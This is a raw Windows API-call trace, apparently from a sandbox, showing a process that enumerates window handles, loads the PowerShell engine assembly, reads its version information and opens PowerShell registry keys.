	[0248.998] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x1ec
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x440
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x7e8
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x730
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x2c8
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x31c
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x330
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x128
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x5c8
	[0248.998] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x6f8
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x358
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x73c
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb0
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x250
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x240
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x790
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x61c
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x540
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x538
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x568
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x538
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x568
	[0248.999] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x538
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x540
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x540
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x510
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x57c
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x554
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x528
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x79c
	[0249.000] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4e0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x44c
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x778
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x558
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4d0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x9b0
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x8d8
	[0249.001] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x940
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x93c
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4ec
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x150
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x720
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x3c4
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x7d4
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x6c8
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb54
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb54
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb5c
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x838
	[0249.002] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x818
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x5b8
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x494
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x1ec
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x440
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x7e8
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x730
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x2c8
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x31c
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x330
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x128
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x5c8
	[0249.003] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x6f8
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x358
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x73c
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0xb0
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x250
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x240
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x790
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x61c
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x568
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x538
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x540
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x510
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x79c
	[0249.004] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x4e0
	[0249.005] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x460
	[0249.005] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcdd20 | out: lpdwProcessId=0xcdd20) returned 0x778
	[0249.007] WerSetFlags () returned 0x0
	[0249.013] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0249.013] CoTaskMemFree (pv=0x0) 
	[0249.014] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce080 | out: pulNumLanguages=0xce088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce080) returned 1
	[0249.014] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce088, pwszLanguagesBuffer=0x2bddd30, pcchLanguagesBuffer=0xce080 | out: pulNumLanguages=0xce088, pwszLanguagesBuffer=0x2bddd30, pcchLanguagesBuffer=0xce080) returned 1
	[0249.018] CoTaskMemAlloc (cb=0x24) returned 0x1c7320
	[0249.018] GetUserDefaultLocaleName (in: lpLocaleName=0x1c7320, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0249.018] CoTaskMemFree (pv=0x1c7320) 
	[0249.037] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0249.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.038] CoTaskMemFree (pv=0x11bed0) 
	[0249.039] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0249.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.039] CoTaskMemFree (pv=0x11bed0) 
	[0249.041] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0249.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.041] CoTaskMemFree (pv=0x11bed0) 
	[0249.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.502] SetErrorMode (uMode=0x1) returned 0x1
	[0249.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdd00 | out: lpFileInformation=0xcdd00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0249.502] SetErrorMode (uMode=0x1) returned 0x1
	[0249.502] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdf70 | out: lpdwHandle=0xcdf70) returned 0x94c
	[0249.503] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be15c0 | out: lpData=0x2be15c0) returned 1
	[0249.504] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdee8, puLen=0xcdee0 | out: lplpBuffer=0xcdee8*=0x2be165c, puLen=0xcdee0) returned 1
	[0249.504] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be1738, puLen=0xcde50) returned 1
	[0249.504] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0249.504] CoTaskMemAlloc (cb=0x2e) returned 0x1c98c0
	[0249.504] lstrcpyW (in: lpString1=0x1c98c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0249.504] CoTaskMemFree (pv=0x1c98c0) 
	[0249.504] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be178c, puLen=0xcde50) returned 1
	[0249.504] lstrlenW (lpString="System.Management.Automation") returned 28
	[0249.504] CoTaskMemAlloc (cb=0x3c) returned 0x1d0ee0
	[0249.504] lstrcpyW (in: lpString1=0x1d0ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0249.505] CoTaskMemFree (pv=0x1d0ee0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be17e8, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.505] CoTaskMemAlloc (cb=0x20) returned 0x1ce1b0
	[0249.505] lstrcpyW (in: lpString1=0x1ce1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.505] CoTaskMemFree (pv=0x1ce1b0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be1828, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.505] CoTaskMemAlloc (cb=0x44) returned 0x1d0ee0
	[0249.505] lstrcpyW (in: lpString1=0x1d0ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.505] CoTaskMemFree (pv=0x1d0ee0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be1890, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0249.505] CoTaskMemAlloc (cb=0x76) returned 0x174190
	[0249.505] lstrcpyW (in: lpString1=0x174190, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0249.505] CoTaskMemFree (pv=0x174190) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be192c, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.505] CoTaskMemAlloc (cb=0x44) returned 0x1d0ee0
	[0249.505] lstrcpyW (in: lpString1=0x1d0ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.505] CoTaskMemFree (pv=0x1d0ee0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be1990, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0249.505] CoTaskMemAlloc (cb=0x58) returned 0x1970a0
	[0249.505] lstrcpyW (in: lpString1=0x1970a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0249.505] CoTaskMemFree (pv=0x1970a0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be1a0c, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.505] CoTaskMemAlloc (cb=0x20) returned 0x1ce1b0
	[0249.505] lstrcpyW (in: lpString1=0x1ce1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.505] CoTaskMemFree (pv=0x1ce1b0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x2be16b4, puLen=0xcde50) returned 1
	[0249.505] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0249.505] CoTaskMemAlloc (cb=0x66) returned 0x1c60d0
	[0249.505] lstrcpyW (in: lpString1=0x1c60d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0249.505] CoTaskMemFree (pv=0x1c60d0) 
	[0249.505] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x0, puLen=0xcde50) returned 0
	[0249.506] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x0, puLen=0xcde50) returned 0
	[0249.506] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcde58, puLen=0xcde50 | out: lplpBuffer=0xcde58*=0x0, puLen=0xcde50) returned 0
	[0249.506] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcde28, puLen=0xcde20 | out: lplpBuffer=0xcde28*=0x2be165c, puLen=0xcde20) returned 1
	[0249.506] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0249.506] VerLanguageNameW (in: wLang=0x0, szLang=0x1766d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0249.506] CoTaskMemFree (pv=0x1766d0) 
	[0249.506] VerQueryValueW (in: pBlock=0x2be15c0, lpSubBlock="\\", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2be15e8, puLen=0xcde70) returned 1
	[0249.512] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0249.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.512] CoTaskMemFree (pv=0x11bed0) 
	[0249.515] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0249.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.516] CoTaskMemFree (pv=0x11bed0) 
	[0249.519] lstrlenW (lpString="䅁") returned 1
	[0249.527] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdd48 | out: phkResult=0xcdd48*=0x304) returned 0x0
	[0249.528] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdd38 | out: phkResult=0xcdd38*=0x308) returned 0x0
	[0249.529] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcddc8 | out: phkResult=0xcddc8*=0x30c) returned 0x0
	[0249.531] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdd0c, lpData=0x0, lpcbData=0xcdd08*=0x0 | out: lpType=0xcdd0c*=0x1, lpData=0x0, lpcbData=0xcdd08*=0x56) returned 0x0
	[0249.532] CoTaskMemAlloc (cb=0x5a) returned 0x1c6060
	[0249.532] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdcdc, lpData=0x1c6060, lpcbData=0xcdcd8*=0x56 | out: lpType=0xcdcdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdcd8*=0x56) returned 0x0
	[0249.532] CoTaskMemFree (pv=0x1c6060) 
	[0249.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.055] CoTaskMemAlloc (cb=0x104) returned 0x11bed0
	[0250.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x11bed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.055] CoTaskMemFree (pv=0x11bed0) 
	[0251.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
